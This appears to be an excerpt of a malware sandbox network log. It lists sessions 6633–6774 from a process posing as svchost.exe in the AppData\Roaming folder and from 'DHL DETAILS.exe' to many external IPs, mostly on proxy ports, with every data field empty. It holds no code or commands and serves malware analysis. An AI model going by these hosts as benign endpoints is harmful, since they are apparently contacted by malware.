Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6633	192.168.2.5	60790	200.174.198.95	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6634	192.168.2.5	58819	60.188.102.225	18080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6635	192.168.2.5	60951	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6636	192.168.2.5	60032	142.54.236.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6637	192.168.2.5	64413	62.152.53.186	8909	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6638	192.168.2.5	60980	139.162.181.177	60844	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6639	192.168.2.5	58826	92.204.135.203	29212	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6640	192.168.2.5	60990	3.10.93.50	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6641	192.168.2.5	60943	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6642	192.168.2.5	61006	93.190.142.57	26541	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6643	192.168.2.5	60999	20.206.106.192	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6644	192.168.2.5	57711	147.124.212.31	11070	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6645	192.168.2.5	64507	34.84.95.189	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6646	192.168.2.5	61195	8.218.231.62	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6647	192.168.2.5	57632	148.72.23.56	3260	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6648	192.168.2.5	56909	45.124.113.6	9500	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6649	192.168.2.5	61271	46.17.63.166	4444	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6650	192.168.2.5	57593	51.222.241.8	62916	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6651	192.168.2.5	61549	107.181.161.81	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6652	192.168.2.5	61297	51.38.63.124	27294	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6653	192.168.2.5	61408	172.67.181.107	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6654	192.168.2.5	61201	43.133.70.57	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6655	192.168.2.5	59800	111.16.50.12	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6656	192.168.2.5	61257	45.227.193.166	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6657	192.168.2.5	58896	128.199.196.31	38832	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6658	192.168.2.5	61508	47.184.175.164	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6659	192.168.2.5	61525	52.35.240.119	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6660	192.168.2.5	59940	139.162.238.184	29870	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6661	192.168.2.5	64498	91.134.140.160	57320	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6662	192.168.2.5	60966	62.171.133.66	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6663	192.168.2.5	60656	117.160.250.133	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6664	192.168.2.5	57487	163.172.149.133	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6665	192.168.2.5	61418	104.145.235.200	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6666	192.168.2.5	64569	78.128.81.220	31623	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6667	192.168.2.5	61452	72.210.221.197	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6668	192.168.2.5	61693	104.17.84.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6669	192.168.2.5	59926	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6670	192.168.2.5	61769	172.67.206.105	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6671	192.168.2.5	61728	50.63.12.33	23859	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6672	192.168.2.5	61383	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6673	192.168.2.5	61088	111.206.0.99	8181	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6674	192.168.2.5	61347	52.67.10.183	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6675	192.168.2.5	61573	45.81.232.17	61553	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6676	192.168.2.5	61330	77.46.138.37	33608	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6677	192.168.2.5	61376	177.12.118.160	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6678	192.168.2.5	61835	31.43.179.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6679	192.168.2.5	61798	104.129.205.94	54321	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6680	192.168.2.5	60901	120.194.4.157	82	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6681	192.168.2.5	61790	4.236.183.37	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6682	192.168.2.5	61580	202.83.102.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6683	192.168.2.5	61562	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6684	192.168.2.5	59734	35.209.198.222	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6685	192.168.2.5	61932	162.159.242.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6686	192.168.2.5	62023	172.67.53.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6687	192.168.2.5	62054	184.169.154.119	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6688	192.168.2.5	61634	171.250.222.13	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
6689	192.168.2.5	62011	162.214.227.68	55392

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6690	192.168.2.5	61941	12.186.205.120	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6691	192.168.2.5	61616	52.172.1.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6692	192.168.2.5	60924	117.160.250.163	9999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6693	192.168.2.5	62058	142.54.236.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6694	192.168.2.5	61904	44.190.9.65	48100	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6695	192.168.2.5	57146	148.66.130.53	23998	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6696	192.168.2.5	61993	129.213.150.205	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6697	192.168.2.5	57875	115.89.203.59	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6698	192.168.2.5	61815	45.81.232.17	9165	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6699	192.168.2.5	57653	180.180.218.250	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6700	192.168.2.5	57754	103.180.123.141	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6701	192.168.2.5	57307	181.209.78.75	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6702	192.168.2.5	57774	103.48.69.113	82	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6703	192.168.2.5	57947	23.94.214.8	9054	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6704	192.168.2.5	61805	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6705	192.168.2.5	60086	198.57.195.42	38242	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6706	192.168.2.5	61702	193.151.130.114	8086	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6707	192.168.2.5	62082	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6708	192.168.2.5	61842	91.189.177.190	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6709	192.168.2.5	60312	147.124.212.31	30479	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6710	192.168.2.5	64653	181.129.183.19	53281	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6711	192.168.2.5	61829	185.49.31.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6712	192.168.2.5	59888	192.252.208.70	14282	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6713	192.168.2.5	61813	47.74.152.29	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6714	192.168.2.5	57874	161.97.163.52	45725	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6715	192.168.2.5	61905	185.225.232.191	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6716	192.168.2.5	61798	104.129.205.94	54321	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6717	192.168.2.5	62065	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6718	192.168.2.5	61994	15.236.106.236	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6719	192.168.2.5	62049	46.35.9.110	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6720	192.168.2.5	61972	58.246.58.150	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6721	192.168.2.5	61753	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6722	192.168.2.5	61936	120.78.191.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6723	192.168.2.5	62003	219.243.212.118	8443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6724	192.168.2.5	60192	45.11.95.166	6012	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6725	192.168.2.5	62037	13.229.47.109	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6726	192.168.2.5	62068	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6727	192.168.2.5	60035	69.61.200.104	36181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6728	192.168.2.5	60378	115.96.208.124	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6729	192.168.2.5	60538	50.63.12.33	14738	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6730	192.168.2.5	62053	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6731	192.168.2.5	60377	34.23.45.223	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6732	192.168.2.5	62018	65.1.244.232	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6733	192.168.2.5	62079	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6734	192.168.2.5	62084	3.10.93.50	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6735	192.168.2.5	61308	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6736	192.168.2.5	62080	65.21.255.197	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6737	192.168.2.5	62102	162.214.227.68	60433	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6738	192.168.2.5	62097	52.54.249.241	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6739	192.168.2.5	62239	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6740	192.168.2.5	57485	117.160.250.132	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6741	192.168.2.5	60487	45.128.133.239	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6742	192.168.2.5	60329	161.97.173.42	52463	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6743	192.168.2.5	60397	51.89.173.40	23313	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6744	192.168.2.5	64672	164.92.237.188	63722	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6745	192.168.2.5	62248	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6746	192.168.2.5	62251	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6747	192.168.2.5	62253	202.159.35.153	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6748	192.168.2.5	57959	121.130.172.153	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6749	192.168.2.5	59198	18.166.142.180	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6750	192.168.2.5	62087	103.49.202.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6751	192.168.2.5	62096	203.222.24.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6752	192.168.2.5	61958	110.93.227.28	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6753	192.168.2.5	60477	45.11.95.166	6008	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6754	192.168.2.5	62165	104.20.75.132	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6755	192.168.2.5	62099	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6756	192.168.2.5	61647	117.160.250.132	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6757	192.168.2.5	62186	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6758	192.168.2.5	60583	167.172.159.43	22847	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6759	192.168.2.5	59246	159.65.245.255	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6760	192.168.2.5	59194	72.195.34.59	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6761	192.168.2.5	59771	209.97.150.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6762	192.168.2.5	58202	50.63.12.33	25492	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6763	192.168.2.5	60925	143.198.226.25	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6764	192.168.2.5	62187	44.190.9.65	48100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6765	192.168.2.5	62244	162.215.219.157	48117	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6766	192.168.2.5	58020	51.15.242.202	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6767	192.168.2.5	60690	109.164.38.189	2306	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6768	192.168.2.5	62242	3.12.144.146	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6769	192.168.2.5	62114	47.243.114.192	8180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6770	192.168.2.5	60876	162.214.225.223	49556	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6771	192.168.2.5	62116	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6772	192.168.2.5	60175	104.200.135.46	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6773	192.168.2.5	64705	92.204.134.38	25675	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6774	192.168.2.5	51486	74.119.147.209	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

